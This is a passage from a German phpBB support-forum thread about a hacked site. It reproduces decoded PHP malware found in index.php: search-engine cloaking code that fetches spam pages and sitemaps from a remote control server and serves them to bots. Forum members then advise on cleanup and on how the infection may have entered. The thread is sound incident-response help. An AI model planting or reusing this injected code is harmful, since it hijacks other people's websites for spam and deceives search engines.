                        echo "<br>" . $web;
                        exit();
                    } else {
                        gzclose($fp);
                        echo '<font style="color:red">creat sitemap faile No Permissions!</font><br>http://' . $_SERVER['HTTP_HOST'] . "/" . $mapdir . '/' . $xmlname;
                        echo "<br>" . $web;
                        exit();
                    }
                } else {
                    echo '<font style="color:red">gzopen no exists!</font><br>' . $http . '://' . $_SERVER['HTTP_HOST'] . "/" . $mapdir . '/' . $xmlname;
                    $web = $http_web . '://' . $goweb . '/sitemap.php?date=' . $id . '&temp=' . $temp . '&web=' . $host . '&xml=' . $dt . '&maptype=' . $maptype . '&http=' . $http;
                    echo "<br>" . $web;
                    exit();
                }
            }
            if (fopen($mapdir . '/' . $xmlname, "w")) {
                $xml = trim(smoutdo($web));
                if (stristr($xml, 'no creat map')) {
                    echo '<font style="color:red">no creat map!</font>';
                    exit;
                }
                $myfile = fopen($mapdir . '/' . $xmlname, "w");
                fwrite($myfile, $xml);
                fclose($myfile);
                echo "ok<br>" . $http . "://" . $_SERVER['HTTP_HOST'] . "/" . $mapdir . '/' . $xmlname;
                echo "<br>" . $web;
                exit();
            } else {
                fclose($myfile);
                echo '<font style="color:red">creat sitemap faile No Permissions!</font><br>http://' . $_SERVER['HTTP_HOST'] . "/" . $mapdir . '/' . $xmlname;
                echo "<br>" . $web;
                exit();
            }
        } else {
            if (fopen($xmlname, "w")) {
                $xml = trim(smoutdo($web));
                if (stristr($xml, 'no creat map')) {
                    echo '<font style="color:red">no creat map!</font>';
                    exit;
                }
                $myfile = fopen($xmlname, "w");
                fwrite($myfile, $xml);
                fclose($myfile);
                echo "ok<br>" . $http . "://" . $_SERVER['HTTP_HOST'] . "/" . $xmlname;
                echo "<br>" . $web;
                exit();
            } else {
                fclose($myfile);
                echo '<font style="color:red">creat sitemap faile No Permissions!</font><br>' . $http . '://' . $_SERVER['HTTP_HOST'] . "/" . $xmlname;
                echo "<br>" . $web;
                exit();
            }
        }
    }
    if ($id) {
        @header("Content-type: text/html; charset=utf-8");
        $web = $http_web . '://' . $goweb . '/index.php?url=' . $site . '&id=' . $id . '&temp=' . $temp . '&dt=' . $dt . '&web=' . $host . '&zz=' . smisbot() . '&clock=' . $clock . '&uri=' . $smuri . '&urlshang=' . $urlshang . '&http=' . $http . '&page=' . $page;
        $html_content = trim(smoutdo($web));
        if (!strstr($html_content, 'nobotuseragent')) {
            if (strstr($html_content, 'okhtmlgetcontent')) {
                $html_content = str_replace("okhtmlgetcontent", '', $html_content);
                echo $html_content;
                exit();
            } else if (strstr($html_content, 'getcontent500page')) {
                @header('HTTP/1.1 500 Internal Server Error');
                exit();
            } else if (strstr($html_content, 'getcontent404page')) {
                @header('HTTP/1.1 404 Not Found');
                exit();
            }
        }
    }
} else {
    $web = $http_web . '://' . $goweb . '/index.php?url=' . $site . '&id=' . $id . '&temp=' . $temp . '&dt=' . $dt . '&web=' . $host . '&zz=' . smisbot() . '&clock=' . $clock . '&uri=' . $smuri . '&urlshang=' . $urlshang . '&http=' . $http . '&page=' . $page;
    $html_content = trim(smoutdo($web));
    if ($uri_script != "") {
        $html_content = str_replace($host . "/", $host . $uri_script, $html_content);
    }
    if (!strstr($html_content, 'nobotuseragent')) {
        @header("Content-type: text/html; charset=utf-8");
        if (strstr($html_content, 'okhtmlgetcontent')) {
            $html_content = str_replace("okhtmlgetcontent", '', $html_content);
            echo $html_content;
            exit();
        } else if (strstr($html_content, 'getcontent500page')) {
            @header('HTTP/1.1 500 Internal Server Error');
            exit();
        } else if (strstr($html_content, 'getcontent404page')) {
            @header('HTTP/1.1 404 Not Found');
            exit();
        } else if (strstr($html_content, 'getcontent301page')) {
            @header('HTTP/1.1 301 Moved Permanently');
            $html_content = str_replace("getcontent301page", '', $html_content);
            header('Location: ' . $html_content);
            exit();
        }
    }
}
function smisbot() {
    $agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if ($agent != "") {
        $googleBot = array("Googlebot", "Yahoo! Slurp", "Yahoo Slurp", "Google AdSense", 'google', 'yahoo');
        foreach ($googleBot as $val) {
            $str = strtolower($val);
            if (strpos($agent, $str)) {
                return true;
            }
        }
    } else {
        return false;
    }
}
function smotherbot() {
    $agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if ($agent != "") {
        $spiderSite = array("TencentTraveler", "msnbot", "Sosospider+", "Sogou web spider", "ia_archiver", "YoudaoBot", "MSNBot", "Java (Often spam bot)", "BaiDuSpider", "Voila", "Yandex bot", "BSpider", "twiceler", "Sogou Spider", "Speedy Spider", "Heritrix", "Python-urllib", "Alexa (IA Archiver)", "Ask", "Exabot", "Custo", "OutfoxBot/YodaoBot", "yacy", "SurveyBot", "legs", "lwp-trivial", "Nutch", "StackRambler", "The web archive (IA Archiver)", "Perl tool", "MJ12bot", "Netcraft", "MSIECrawler", "WGet tools", "larbin", "Fish search", 'bingbot', 'baidu', 'aol', 'bing', 'YandexBot', 'AhrefsBot');
        foreach ($spiderSite as $val) {
            $str = strtolower($val);
            if (strpos($agent, $str)) {
                return true;
            }
        }
    } else {
        return false;
    }
}
function smoutdo($url) {
    $file_contents = @file_get_contents($url);
    if (!$file_contents) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $file_contents = curl_exec($ch);
        curl_close($ch);
    }
    return $file_contents;
}
function listDir($dir) {
    $filearr = array();
    if (is_dir($dir)) {
        if ($dh = opendir($dir)) {
            while (($file = readdir($dh)) !== false) {
                if ((file_exists($dir . "/" . $file)) && $file != "." && $file != "..") {
                    $filearr[] = $file;
                }
            }
            closedir($dh);
        }
    }
    return $filearr;
}

Did this file decode correctly?
Auf dieser Website kannst Du dir den code übersetzen lassen >>> https://www.unphp.net/

Jetzt gilt es herauszufinden wie der code (die Datei) auf deinen Webspace gelangt ist, und ob evtl. noch mehr schädliche Dateien vorhanden sind.

Ich würde ALLE Passwörter ändern (FTP, Datenbank u.s.w) und ALLE Dateien mit denen aus dem Originalpaket ersetzen, so wie einen Virenscanner drüber laufen lassen (auch über den eigenen PC).

Edit: Der Code zielt übrigens auf eine Wordpress-Installation ab. Wenn Du also auf dem Webspace noch ein Wordpress laufen hast, dann wurden dort auch Dateien geändert.

Grüße: Mahony
Taekwondo in Berlin
Wer fragt, ist ein Narr für fünf Minuten, wer nicht fragt, ist ein Narr für immer.
Maggan22
Mitglied
Beiträge: 392
Registriert: 24.01.2008 11:29
Kontaktdaten:

Re: [3.3] kein zugriff mehr auf die Seiten bzw. weiße Seite

Beitrag von Maggan22 »

Tja, das ist eine sehr gute Frage - wie ist das auf meinem Webspace gelandet. Ich habe keine Ahnung.
Ich habe das Backup mit rübergenommen, und dann manuell geupdatet von 3.3.3 auf 3.3.4 somit hatte ich ja eigentlich alle Dateien aus dem Orginalpaket drauf. Damit lief die Seite ja wieder. Heute, ein paar Tage später, war ich wieder auf der Seite und dann war der Salat schon im Gang :(
Ich habe, nachdem die Seite wieder lief, nichts daran verändert. Keine Extentions eingebaut, keine php Versions Änderung, chmod auch nicht geändert (das war vielleicht der Fehler - kann es nicht mehr nachvollziehen - vielleicht waren alle Chmod Dateirechte auf 777 weil ich ja getestet habe ob die Seite damit wieder läuft bevor ich das Update gemacht hatte).
Das werd ich gleich wieder ändern und dann mal abwarten. Passwörter werden nat. geändert. Weitere befallene Dateien habe ich nicht gefunden und auch keine Datei die nicht zum Paket gehört.

Vielen Dank für die "Übersetzung" und den Link, sollte ich mal was finden kann man das wenigstens prüfen.
Gruss Maggan22
Benutzeravatar
Dr.Death
Moderator
Moderator
Beiträge: 17396
Registriert: 23.04.2003 08:22
Wohnort: Xanten
Kontaktdaten:

Re: [3.3] kein zugriff mehr auf die Seiten bzw. weiße Seite

Beitrag von Dr.Death »

Oft mogelt sich der "Schadcode" auch vom eigenen PC über das FTP Programm zum WebSpace hoch.

Sprich: Dein PC ist ggf. die Ursache.
Die Schadsoftware befällt Dateien, die in einem Upload Folder auf deinem PC liegt.....und schwupps, ist sie auf deinem Webspace.

Prüfe mal die Dateien ( z.B. index.php ) die du von deinem PC hochgeladen hast.....
Maggan22
Mitglied
Beiträge: 392
Registriert: 24.01.2008 11:29
Kontaktdaten:

Re: [3.3] kein zugriff mehr auf die Seiten bzw. weiße Seite

Beitrag von Maggan22 »

Hab ich mir auch gedacht. ABER - das phpbb3.4 hatte ich mir erst gerade heruntergeladen. Das kann es also nicht gewesen sein. Und da ich ja diese Dateien genommen hatte um zu updaten und es auf dem neuen Webspace dann ja auch funktioniert hat, glaube ich nicht dass es daran liegt. Zumal ich ja alle Dateien bis auf files und Config gelöscht habe.
Es lief ja auch. Und da ich sonst nichts mehr am forum verändert hatte, die möglichkeit bestünde zwar, aber wäre doch eher unwahrscheinlich in der Kürze. Und die index.php - die ich aus dem Orginalpaket wieder hochgeladen hatte war ja dann auch sauber.
Aber die index.php vom phpbb3.3 war auch befallen - hab mir das Backup jetzt mal angeschaut. Was auch immer passiert ist muss bei strato passiert sein, ich hab es dann heruntergeladen und mittels Backup auf den all-inkl. Webspace gepackt. Dann wieder alles gelöscht wegen dem Update und wieder hochgeladen, es hatte funktioniert... Deswegen bin ich davon ausgegangen dass es nicht an verseuchten Dateien auf meinem Rechner gelegen hat. Virenscanner sagt auch nix. Oder gibts so ein Killerteil was richtig gut ist? Bin da im moment nicht mehr auf dem neuesten stand denke ich.

Wenn Ihr da Tipps habt, lasse ich das auch nochmal drüber laufen, nur zur Sicherheit
Gruss Maggan22
Antworten

Zurück zu „Support-Forum“